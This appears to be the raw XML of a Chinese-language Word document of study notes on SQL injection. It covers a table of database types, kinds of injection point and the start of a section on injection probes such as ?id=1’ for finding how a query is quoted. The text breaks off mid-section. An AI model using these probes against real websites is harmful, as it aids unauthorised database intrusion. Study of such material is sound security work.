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4FD1" w14:textId="139E35DF" w:rsidR="00793087" w:rsidRDefault="00491190" w:rsidP="000874CF">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D66907" w14:textId="2D7876D8" w:rsidR="002F1730" w:rsidRDefault="002F1730" w:rsidP="00491190">
      <w:r>
        <w:t>什么是</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CC5E0" w14:textId="54882036" w:rsidR="002F1730" w:rsidRPr="002F1730" w:rsidRDefault="002F1730" w:rsidP="00491190">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过把</w:t>
      </w:r>
      <w:r>
        <w:t>SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6BE430" w14:textId="0F99A225" w:rsidR="00310E9B" w:rsidRDefault="00310E9B" w:rsidP="000874CF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8506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330"/>
        <w:gridCol w:w="2718"/>
        <w:gridCol w:w="3761"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="2C84F355" w14:textId="77777777" w:rsidTr="00491190">
        <w:trPr>
          <w:trHeight w:val="199"/>
          <w:tblHeader/>
        </w:trPr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3DE5B6F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大类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466AE9A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类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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2453EC2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前3~5名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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5857922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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="1332504A" w14:textId="77777777" w:rsidTr="00491190">
        <w:trPr>
          <w:trHeight w:val="265"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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7BF87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SQL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B41A3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关系数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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1C867" w14:textId="36879EB9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Oracle、MySQL/MariaDB、SQL Server、PostgrcSQL、 DB2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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20E7B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遵循“表一记录”模型。按行存储在文件中(先第 1 行，然后第 2 行……)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C35838" w:rsidRPr="00AC3AE3" w14:paraId="299636D6" w14:textId="77777777" w:rsidTr="00491190">
        <w:trPr>
          <w:trHeight w:val="332"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EE4ED" w14:textId="0F8FDCC0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  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>NoSQL</w:t>
            </w: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11ADB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时序数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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03DB1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InfluxDB、RRDtool、Graphite、OpcnTSDB、Kdb+   </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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B8BFD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存储时间序列数据，每条记录都带有时间戳。如存储从感应器采集到的数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="60EBAAEE" w14:textId="77777777" w:rsidTr="00491190">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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C285FD" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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AF101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键/值数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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CB91E" w14:textId="32FAAE0E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  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Redis</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35838">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>、Memcached、Riak KV、Hazelcast、Ehcache </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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660C8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遵循“键——值”模型，是最简单的数据库管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="22815950" w14:textId="77777777" w:rsidTr="00491190">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0947DF" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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726EE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文档数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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D4808" w14:textId="55F356EA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  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>MongoDB</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35838">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>、Couchbase、Amazon DynamoDB、CouchDB、MarkLogic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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1575C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无固定结构，不同的记录允许有不同的列数和列类型。列允许包含多值，记录允许嵌套</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="257A2642" w14:textId="77777777" w:rsidTr="00491190">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4C1353" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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E3903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图数椐库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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DE41C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Neo4j、OrientDB、Titan、Virtuoso、ArangoDB    </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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4CC9A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以“点——边”组成的网络（图结构）来存储数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="55EFF088" w14:textId="77777777" w:rsidTr="00491190">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1A848C" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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BCF24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搜索引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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68194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Elasticsearch、Solr、Splunk、MarkLogic、Sphinx </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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5DB04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存储的目的是为了搜索，主要功能是搜索</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="418B379D" w14:textId="77777777" w:rsidTr="00491190">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0EB8791" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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CB0AD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对象数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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29F02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Caché、db4o、Versant Object Database、ObjcctStore、Matisse </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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AF87A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受面向对象编程语言的启发，把数据定义为对象并存储在数据库中，包括对象之问的关系，如继承</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491190" w:rsidRPr="00AC3AE3" w14:paraId="1D400625" w14:textId="77777777" w:rsidTr="00491190">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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E14CF7" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18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26BC9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宽列数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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DBF82" w14:textId="62334B4F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Cassandra、</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35838">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>HBase</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35838">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>、Accumulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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8AE9F" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00C35838" w:rsidRDefault="00AC3AE3" w:rsidP="00C35838">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C35838">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>按照列（由“键——值”对组成的列表）在数据文件中记录数据，以获得更好的请求及遍历效率。一行中的列数允许动态变化，且列的数目可达数百万，每条记录的关键码不同，支持多值列。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13EE1CBE" w14:textId="77777777" w:rsidR="00AC3AE3" w:rsidRPr="00AC3AE3" w:rsidRDefault="00AC3AE3" w:rsidP="00AC3AE3"/>
    <w:p w14:paraId="21180AC1" w14:textId="63ABCF91" w:rsidR="00BD17ED" w:rsidRDefault="00BD17ED" w:rsidP="000874CF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C82FD5" w14:textId="558B19C7" w:rsidR="00973FA0" w:rsidRPr="001B402F" w:rsidRDefault="00973FA0" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="001B402F">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/weixin_51387754/article/details/119749329</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8AB19C" w14:textId="3C93C395" w:rsidR="002F1730" w:rsidRPr="002F1730" w:rsidRDefault="001B402F" w:rsidP="002F1730">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B402F">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/bandongshen9543/article/details/101532806</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CADD74C" w14:textId="77777777" w:rsidR="002F1730" w:rsidRDefault="002F1730" w:rsidP="002F1730"/>
    <w:p w14:paraId="325574E4" w14:textId="129E7A1F" w:rsidR="002F1730" w:rsidRDefault="00B43593" w:rsidP="00B43593">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql注入一般分为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B89BECD" w14:textId="77777777" w:rsidR="00321DC3" w:rsidRDefault="00B43593" w:rsidP="00B43593">
      <w:r>
        <w:t>按注入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77EF91" w14:textId="0E944EA8" w:rsidR="00B43593" w:rsidRDefault="00B43593" w:rsidP="00B43593">
      <w:r>
        <w:t>1.数字型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点，形如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>http://xxx.com/users.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350324DD" w14:textId="1EF2554E" w:rsidR="00B43593" w:rsidRPr="00B43593" w:rsidRDefault="00B43593" w:rsidP="00B43593">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符型注入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，形如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>http://xxx.com/users.php?name=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3888C9" w14:textId="5E362D9E" w:rsidR="00B43593" w:rsidRDefault="00B43593" w:rsidP="00321DC3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索型注入点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过搜索框表单提交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其原形大致为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve"> like '%</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00B43593">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80E089" w14:textId="6E69C890" w:rsidR="00B43593" w:rsidRDefault="00B43593" w:rsidP="00321DC3">
      <w:r w:rsidRPr="00321DC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照数据提交方式</w:t>
      </w:r>
      <w:r w:rsidR="00321DC3" w:rsidRPr="00321DC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B403385" w14:textId="3EB755E7" w:rsidR="00321DC3" w:rsidRDefault="00321DC3" w:rsidP="00321DC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t xml:space="preserve"> GET 注入</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点的位置在</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t xml:space="preserve"> GET 参数部分</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，形如</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t>http://xxx.com/news.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE7507" w14:textId="2CE28773" w:rsidR="00321DC3" w:rsidRDefault="00321DC3" w:rsidP="00321DC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t xml:space="preserve"> POST 注入</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点位置在</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t xml:space="preserve"> POST 数据部分</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，抓包进行修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09730891" w14:textId="2DD39A9C" w:rsidR="007D201B" w:rsidRDefault="007D201B" w:rsidP="007D201B">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00491190">
        <w:t xml:space="preserve"> HTTP 头部注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007D201B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点在</w:t>
      </w:r>
      <w:r w:rsidRPr="007D201B">
        <w:t xml:space="preserve"> HTTP 请求头部的某个字段中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546EF7C8" w14:textId="6E575651" w:rsidR="007D201B" w:rsidRDefault="007D201B" w:rsidP="007D201B">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00321DC3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t xml:space="preserve"> Cookie 注入</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t>HTT</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00491190" w:rsidRPr="00491190">
        <w:t>请求的时候会带上客户端的Cookie, 注入点存在 Cookie 当中的某个字段中</w:t>
      </w:r>
      <w:r w:rsidR="00491190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="007D201B">
        <w:t>严格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说</w:t>
      </w:r>
      <w:r w:rsidRPr="007D201B">
        <w:t>，Cookie 其实应该也是算</w:t>
      </w:r>
      <w:r w:rsidRPr="00491190">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D201B">
        <w:t>头部注入的一种形式。因为在 HTTP 请求的时候，Cookie 是头部的一个字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634580A6" w14:textId="6BAF3256" w:rsidR="00321DC3" w:rsidRPr="007D201B" w:rsidRDefault="007D201B" w:rsidP="00321DC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上区别在于注入点的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E15C7F4" w14:textId="04B1BFDD" w:rsidR="00ED61D6" w:rsidRDefault="00ED61D6" w:rsidP="000874CF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用sql注入语句整理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A3A4F" w14:textId="5B704AA7" w:rsidR="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="00D41AB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先判断注入点闭合形式的方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECD190" w14:textId="044B1C61" w:rsidR="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="00D41AB9">
      <w:r w:rsidRPr="007C5E10">
        <w:t>SQL语句的闭合形式大概如下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D4E65" w14:textId="2D2211EC" w:rsidR="007C5E10" w:rsidRPr="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="007C5E10">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * FROM `users` WHERE id= 1;#</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>整形闭合</w:t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 w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * FROM `users` WHERE id='1'; #</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>单引号闭合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09287112" w14:textId="118D04D1" w:rsidR="007C5E10" w:rsidRPr="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="007C5E10">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * FROM `users` WHERE id="1";#</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>双引号闭合</w:t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 w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * FROM `users` WHERE id=('1');#</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>单引号加括号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86799B" w14:textId="77777777" w:rsidR="007C5E10" w:rsidRPr="007C5E10" w:rsidRDefault="007C5E10" w:rsidP="007C5E10">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * FROM `users` WHERE id=("1");#</w:t>
      </w:r>
      <w:r w:rsidRPr="007C5E10">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>双引号加括号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B2E34" w14:textId="0F832E0D" w:rsidR="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="00D41AB9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42384E71" w14:textId="77777777" w:rsidR="00D41AB9" w:rsidRPr="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="00D41AB9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>?id=1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7A05E" w14:textId="05261ED2" w:rsidR="00D41AB9" w:rsidRPr="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="00D41AB9">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>?id=1”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F74296" w14:textId="6D756B22" w:rsidR="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="00D41AB9">
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果都报错，则为整形闭合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9BE951" w14:textId="77777777" w:rsidR="001F5B07" w:rsidRDefault="001F5B07" w:rsidP="00D41AB9"/>
    <w:p w14:paraId="039F0A45" w14:textId="6ECB9A9C" w:rsidR="00D41AB9" w:rsidRDefault="001F5B07" w:rsidP="00D41AB9">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D41AB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果单引号报错，双引号不报错，然后尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C35DEA" w14:textId="55D7DF2F" w:rsidR="00D41AB9" w:rsidRDefault="00D41AB9" w:rsidP="001F5B07">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D41AB9">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>?id=1’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
